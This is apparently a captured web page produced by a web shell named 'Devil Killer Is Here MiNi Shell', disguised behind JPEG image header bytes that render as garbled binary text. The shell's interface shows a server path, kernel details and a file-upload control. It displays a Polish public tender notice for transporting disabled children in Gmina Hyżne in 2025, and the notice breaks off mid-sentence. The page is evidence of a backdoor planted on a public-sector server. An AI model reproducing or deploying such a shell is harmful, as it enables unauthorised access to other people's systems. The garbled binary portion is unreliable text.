JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060579101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych z terenu Gminy Hyżne w roku 2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINNY ZESPÓŁ EKONOMICZNO-ADMINISTRACYJNY SZKÓŁ W HYŻNEM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690369570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172295005</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gzeas@hyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gzeashyzne.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność rachunkowo - księgowa, doradztwo podatkowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych z terenu Gminy Hyżne w roku 2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f5e177e5-fe72-417b-a46b-82a218d26d8c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00605791</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ZETOPZP: https://pzp.hyzne.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">ZETOPZP: https://pzp.hyzne.pl/ <br/>https://gzeashyzne.pl/bip/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Ofertę oraz wszystkie załączniki<br/>składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>2) Wykonawca składa ofertę za pośrednictwem:<br/>Platformy zamówieniowej<br/>ZETOPZP: https://pzp.hyzne.pl/<br/>3) Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formatach dopuszczonych<br/>odpowiednimi przepisami prawa tj. m.in.: PDF, DOC, DOCX, RTF, XPS, ODT i podpisana kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w Regulaminie Platformy zamówieniowej. Ofertę należy złożyć<br/>w oryginale. Zamawiający dopuszcza możliwość złożenia oferty w formie skanu dokumentu pierwotnie wytworzonego i wypełnionego<br/>w postaci papierowej, pod warunkiem opatrzenia powstałego w ten sposób dokumentu elektronicznego kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym. Powstały w ten sposób dokument elektroniczny Zamawiający<br/>traktował będzie jako ofertę złożoną w postaci elektronicznej niezależnie od tego, czy jej postać elektroniczna powstała wyłącznie<br/>przy użyciu programu komputerowego, czy też na skutek przekształcenia postaci papierowej do postaci elektronicznej, jeżeli tylko<br/>dokument ten zostanie opatrzony prawidłowym podpisem.<br/>5) Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa należy złożyć w osobnym odpowiednio oznaczonym pliku wraz z<br/>jednoczesnym zaznaczeniem polecenia &#34;Załącznik stanowiący tajemnicę przedsiębiorstwa&#34; a następnie wraz z plikami stanowiącymi<br/>jawną część należy ten plik zaszyfrować.<br/>6) Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę za pośrednictwem Platformy<br/>zamówieniowej. Po upływie terminu do składania ofert Wykonawca nie może skutecznie dokonać zmiany ani wycofać złożonej<br/>oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem<br/>niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego<br/>2) Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa<br/>Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach.<br/>3) Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu:<br/>a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b) zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu Wykonawcą,<br/>c) dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d) przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e) udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f) archiwizacji postępowania.<br/>4) Dane osobowe będą ujawniane Wykonawcom oraz wszystkim zainteresowanym.<br/>5) Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z<br/>przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>6) Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/>a) prawo dostępu do danych (art. 15),<br/>b) prawo sprostowania danych (art. 16),<br/>c) prawo do usunięcia danych (art. 17),<br/>d) prawo do ograniczenia przetwarzania danych (art. 18).<br/>e) prawo wniesienia skargi do organu nadzorczego.<br/>7) Osobie, której dane dotyczą nie przysługuje:<br/>a) prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia<br/>RODO,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO,<br/>8) Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania<br/>warunków udziału w postępowaniu oraz zdolności Wykonawcy do należytego wykonania zamówienia, co skutkować może<br/>wykluczeniem Wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>9) Wystąpienie z żądaniem, o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>10) Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in.<br/>z art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych<br/>osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZEAS.261.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: Dowóz dzieci niepełnosprawnych z terenu Gminy Hyżne w roku 2025 w obie strony w kierunku Rzeszowa <br/>1.1 Przedmiotem zamówienia jest bezpieczny i punktualny dowóz 7 dzieci niepełnosprawnych z terenu Gminy Hyżne do szkół/placówek. Przewóz dotyczy wszystkich dni, w których odbywać się będą zajęcia dydaktyczne, opiekuńcze i wychowawcze zgodnie <br/>z harmonogramem zajęć jaki obowiązuje w danej szkole/placówce w 2025 roku. Maksymalna długość trasy w obie strony stanowi do 100 km +/- 5 km. Dzienna długość trasy uzależniona jest od frekwencji uczniów/dzieci w zajęciach w szkołach/placówkach. Przewidywana liczba dni dowozu to około - 247 dni. <br/>Wykonawca zobowiązany będzie do zapewnienia kierowcy oraz opiekuna dla dzieci w czasie dowozu i w drodze powrotnej oraz zachowania szczególnego bezpieczeństwa w czasie przewozu na trasach: <br/><br/>Trasa I: <br/>Cztery razy w tygodniu <br/>Grzegorzówka Kanada - Grzegorzówka – Wólka Hyżneńska – Dylągówka – Hyżne – Brzezówka – XII Liceum Ogólnokształcące w Rzeszowie, ul. Rejtana 30 - Niepubliczne Przedszkole &#34;Niezapominajka&#34; ul. E. Plater 7 w Rzeszowie - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym (OREW) - KOŁO w Rzeszowie ul. Staszica 10B - Zespół Szkół Specjalnych im. UNICEF <br/>w Rzeszowie, ul. Ofiar Katynia 1 <br/>Jeden raz w tygodniu <br/>Grzegorzówka Kanada - Grzegorzówka – Wólka Hyżneńska – Dylągówka – Hyżne – Brzezówka – Niepubliczne Przedszkole &#34;Niezapominajka&#34; ul. E. Plater 7 w Rzeszowie - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób <br/>z Upośledzeniem Umysłowym (OREW) - KOŁO w Rzeszowie ul. Staszica 10B - XII Liceum Ogólnokształcące w Rzeszowie, ul. Rejtana 30 – PRZYSTANEK MPK ul. Marszałkowska (02), Rzeszów - Zespół Szkół Specjalnych im. UNICEF w Rzeszowie, ul. Ofiar Katynia 1 <br/>Trasa II: <br/>Cztery razy w tygodniu <br/>Niepubliczne Przedszkole &#34;Niezapominajka&#34; ul. E. Plater 7 w Rzeszowie - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym (OREW) – KOŁO w Rzeszowie ul. Staszica 10B - XII Liceum Ogólnokształcące w Rzeszowie, ul. Rejtana 30 – Zespół Szkół Specjalnych im. UNICEF <br/>w Rzeszowie, ul. Ofiar Katynia 1 - Brzezówka – Hyżne – Dylągówka – Wólka Hyżneńska – Grzegorzówka – Grzegorzówka Kanada. <br/>Jeden raz w tygodniu <br/>Niepubliczne Przedszkole &#34;Niezapominajka&#34; ul. E. Plater 7 w Rzeszowie – Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym (OREW) – KOŁO w Rzeszowie ul. Staszica 10B– Zespół Szkół Specjalnych im. UNICEF w Rzeszowie, ul. Ofiar Katynia 1 – XII Liceum Ogólnokształcące <br/>w Rzeszowie, ul. Rejtana 30 – Brzezówka – Hyżne – Dylągówka – Wólka Hyżneńska – Grzegorzówka – Grzegorzówka Kanada. <br/> <br/> <br/>1.2 Wymagania dotyczące sposobu realizacji przedmiotu zamówienia: <br/>a)	Dowóz 7 dzieci wraz z opiekunem codziennie od poniedziałku do piątku (w dniach nauki w szkole/placówce) począwszy od 02.01.2025r. do 31.12.2025r. (podpisanie umowy nastąpi nie wcześniej niż po zatwierdzeniu budżetu na rok 2025)<br/>b)	W trakcie trwania ferii, świąt lub innych dni wyznaczonych przez dyrektorów szkół/ placówek jako wolne od zajęć przewozy nie będą się odbywały. <br/>1.3	Rano dzieci będą zabierane z miejsca zamieszkania i po zakończonych zajęciach w szkołach/placówkach odwożone do miejsca zamieszkania. <br/>1.4	Godziny dowozu i przywozu dzieci uzależnione będą od rozkładów zajęć we wskazanych szkołach/placówkach. <br/>Szczegółowe godziny przewozu dzieci (umożliwiające dotarcie na wyznaczony czas) zostaną ustalone przez Wykonawcę przy udziale Zamawiającego oraz rodziców dzieci dowożonych.<br/>1.5	Wykonawca podczas świadczenia każdego przewozu zobowiązany jest zapewnić dzieciom dodatkowo poza kierowcą opiekuna. <br/>Wymagania dotyczące opiekuna: <br/>Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca pełną zdolność do czynności prawnych. Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: <br/>	zapewnienia bezpieczeństwa w trakcie przewozu dzieci, <br/>	zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu dzieci niepełnosprawnych, <br/>	doprowadzenia i przyprowadzenia z samochodu do szkoły/placówki każdego dziecka. W trakcie realizacji usługi oraz w przypadku indywidualnych zmian zajęć <br/>w szkołach/placówkach Wykonawca zobowiązany będzie kontaktować się z rodzicami i wychowawcami placówek. <br/>1.6	Dzieci dowożone mają wystarczającą sprawność ruchową, aby korzystać ze zwykłych siedzeń pojazdu. Zamawiający w obecnej chwili nie posiada zgłoszeń od rodziców dotyczących przewozu osób na wózkach inwalidzkich itp. <br/><br/><br/>1.7	W ramach umowy Wykonawca zobowiązany będzie do: <br/>1)	dowożenia i odwożenia dzieci z zachowaniem zasady, że dzieci dowożone są do szkół/placówek nie później niż na 10 minut przed rozpoczęciem zajęć, <br/>2)	przewozu dzieci środkiem transportu spełniającym normy do przewozu osób niepełnosprawnych, pojazdy muszą być wyposażone w pasy bezpieczeństwa, <br/>3)	podstawienia niezwłocznie samochodu spełniającego właściwe wymagania techniczne <br/>w ruchu drogowym w przypadku awarii wyznaczonego samochodu, nie później jednak niż w ciągu 60 minut od powstania awarii, <br/>4)	pokrycia dodatkowych kosztów przewozu, wynikłych z wykonania usługi przez podmiot zastępczy wybrany przez Zamawiającego, w przypadku niemożności zrealizowania przewozu przez Wykonawcę, <br/>5)	posiadania ważnej polisy ubezpieczeniowej OC, NNW w okresie realizacji zlecenia, <br/>6)	zapewnienia przewożonym dzieciom niepełnosprawnym opieki podczas dowozu, bezpiecznych i higienicznych warunków przejazdu oraz pomocy w przemieszczaniu się, <br/>7)	zapewnienia bezpieczeństwa osób i mienia podczas wykonywania usługi. <br/>Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku, których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert - Zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli: <br/>1.1.	oferta, spełnia wymagania określone niniejszą specyfikacją, <br/>1.2.	oferta została złożona, w określonym przez Zamawiającego terminie, <br/>1.3.	Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego. <br/> <br/>2.	Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium. <br/>3.	Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt). <br/>4.	Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione poniżej. <br/><br/>Lp. Nazwa kryterium Waga kryterium Szczegółowy opis, wzór Uwagi, objaśnienia <br/>1 cena 60 C = (C min/C o) x 60 C min- najniższa cena brutto z ocenianych ofert (zł) <br/>C o - cena brutto określona w <br/>ocenianej ofercie (zł) <br/>2 termin płatności 40 T = ((To - Tmin) / <br/>(Tmax - Tmin)) x 40 T o - termin płatności <br/>zadeklarowany w ofercie ocenianej <br/>T min. - termin płatności minimalny <br/>T max - termin płatności maksymalny <br/> <br/>5.	Dodatkowe postanowienia dot. kryterium cena: <br/>Punkty w tym kryterium zostaną przyznane według wzoru: <br/> <br/>C = (C min/C o) x 60 pkt <br/>gdzie: <br/>C min- najniższa cena brutto z ocenianych ofert (zł) <br/>C o - cena brutto określona w ocenianej ofercie (zł) <br/> <br/>6.	Dodatkowe postanowienia dot. kryterium termin płatności: <br/>Liczba punktów w kryterium termin płatności zostanie przyznany w oparciu o zadeklarowany przez Wykonawcę termin płatności. Wykonawca może zadeklarować termin płatności <br/>w następującym przedziale dni: <br/>Termin płatności minimalny – 7 dni <br/>Termin płatności maksymalny – 30 dni <br/>Termin płatności należy zadeklarować w dniach <br/> <br/>Sposób przyznawania punktów: <br/>1)	Wykonawca, który zaoferuje maksymalny termin płatności otrzyma maksymalną liczbę punktów w niniejszym kryterium, <br/>2)	Wykonawca, który zaoferuje minimalny termin płatności - otrzyma 0 pkt w niniejszym kryterium, <br/>3)	W przypadku, gdy wszyscy Wykonawcy zaproponują jednakowy termin realizacji, wszyscy otrzymują jednakową liczbę punktów w niniejszym kryterium. <br/>4)	Pozostali, czyli Wykonawcy, którzy zaoferują wartość pośrednią, pomiędzy terminem minimalnym a maksymalnym, otrzymują liczbę punktów obliczoną wg wzoru: <br/> <br/>T = ((To - Tmin) / (Tmax - Tmin)) x 40 pkt. <br/>gdzie: <br/>T o - termin płatności zadeklarowany w ofercie ocenianej <br/>T min. – termin płatności minimalny <br/>T max – termin płatności maksymalny <br/> <br/>7.	Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów. Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty. <br/>8.	Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. <br/>9.	Wykonawca, którego oferta zostanie oceniona jako najkorzystniejszą podlegać będzie badaniu czy nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z pkt. V.5. niniejszej Specyfikacji .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, 